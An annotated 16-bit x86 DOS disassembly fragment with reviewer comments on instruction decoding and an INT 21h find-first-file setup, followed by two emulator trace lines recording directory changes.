0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; decoding from 0x12b84 instead would give push bp / mov bp, sp
0x12b86: in al, dx                   ; byte EC, likely the tail of that mov bp, sp - confirm against the raw bytes
0x12b87: sub sp, 0x2c                ; reserves 0x2C bytes of stack; matches the [bp - 0x2c] buffer used below
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a                ; INT 21h/AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DS:DX = the stack buffer, so find-first results land in a local
0x12b93: int 0x21
0x12b95: mov ah, 0x4e                ; INT 21h/AH=4Eh: find first file
0x12b97: mov cx, 0x10                ; attribute mask 10h: include directories in the search
0x12b9a: mov dx, 0x1b8               ; DS:DX = search pattern at offset 0x1b8; the INT 21h itself is past the end of the listing
2018-12-25T12:21:19.121745643Z 59 PC: 12d9f | Change current directory
2018-12-25T12:21:19.126997085Z 59 PC: 12da6 | Change current directory